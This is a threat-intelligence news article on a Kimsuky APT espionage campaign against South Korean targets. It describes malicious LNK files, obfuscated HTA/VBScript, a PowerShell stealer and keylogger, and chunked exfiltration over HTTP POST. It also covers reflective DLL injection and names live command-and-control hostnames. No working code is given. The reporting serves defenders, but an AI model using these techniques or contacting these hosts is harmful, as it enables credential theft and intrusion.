Kimsuky APT Escalates Cyberespionage with Stealthy LNK Files & Reflective Malware Payloads
Ddos 
Overview of the Infection Chain | Image: Aryaka
A new report from Aryaka Threat Research Labs has disclosured one of the most technically sophisticated and persistent cyber-espionage campaigns launched by North Korea’s Kimsuky APT group. The operation, meticulously dissected in Aryaka’s report, reveals how Kimsuky leverages weaponized Windows shortcut files, layered obfuscation, and reflective in-memory payloads to infiltrate and control compromised systems with precision and stealth.
“This campaign demonstrates Kimsuky APT’s continued evolution in stealth, modularity, and targeting precision,” Aryaka stated in the conclusion of their technical blueprint.
The campaign begins with a delivery method: malicious .LNK (Windows shortcut) files disguised within ZIP attachments in phishing emails. Once clicked, these files silently launch HTA (HTML Application) payloads via mshta.exe, executing obfuscated VBScript that constructs URLs, fetches remote payloads, and ultimately initiates a multi-stage infection process.
“The HTA file contains heavily obfuscated VBScript… using a mix of decimal and hexadecimal values to hide its actual functionality,” the researchers wrote.
Victims are deceived with PDF lure documents, crafted to resemble official South Korean government notices—such as sex offender alerts or tax penalty notices. These documents are downloaded and opened automatically to distract the user while the malware continues executing in the background.
“It is likely that this campaign was distributed via spam emails… embedded within ZIP archives to bypass basic email filtering.”
Once on the victim’s machine, the malware executes a Base64-decoded PowerShell stealer, keylogger, and additional payloads stored in compressed archives like pipe.zip. The stealer extracts credentials from browsers, email clients, and file systems, while the keylogger silently logs keystrokes, clipboard activity, and window titles every 50 milliseconds.
To avoid multiple instances, the malware writes the running script’s Process ID to disk and performs checks to ensure it’s the only active instance. It also contains anti-VM checks to delete itself if it detects analysis environments such as VirtualBox or VMware.
The malware is engineered to prioritize and extract only high-value data—including saved passwords, encryption keys, cryptocurrency wallets, and recently accessed documents. It prepares this data in structured directories under %TEMP%, compresses it, and exfiltrates it via HTTP POST requests in 1MB chunks to evade traffic detection systems.
“UploadFile() is responsible for sending files to the attacker’s server… After a successful upload, the original ZIP and local data are deleted to cover tracks.”
The malware communicates with hardcoded C2 servers (e.g., ygbsbl.hopto.org, hvmeyq.viewdns.net) and regularly checks for new commands. It can receive instructions to download new payloads, upload files, and even execute PowerShell commands in real time via the /cm endpoint.
One advanced tactic involves reflective DLL injection, where the decrypted malware payload is injected directly into memory—avoiding disk writes entirely. This tactic helps it dodge endpoint detection tools that rely on file system activity.
“It allocates memory using VirtualAllocEx(), writes the decrypted DLL… and invokes its execution via CreateRemoteThread(),” Aryaka explained.
The operation clearly targets South Korean individuals and institutions. The use of authentic South Korean government notices as lures, coupled with aggressive data harvesting from Korean certificate stores like NPKI and GPKI, leaves little doubt about the geopolitical intent.
“The tactics… strongly resemble those attributed to Kimsuky… known for conducting cyber-espionage operations primarily against South Korean government bodies, research institutions, and critical infrastructure.”
Aryaka concludes the report by recommending behavioral monitoring, PowerShell auditing, and anomaly-based network detection as key countermeasures.
Related Posts:
- Raven Stealer: New MaaS Infostealer Plunders Data via Reflective Process Hollowing & Telegram Exfil
- North Korean APT Group Kimsuky Targets Japanese Organizations with Stealthy Malware Campaign
- Kimsuky APT: New TTPs Revealed in Rapid7 Cybersecurity Report
- North Korean Cyber Espionage Group Kimsuky Exploits University Website in Watering Hole Attack
- North Korean Hackers Exploit Old Office Flaw to Deploy Keylogger
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
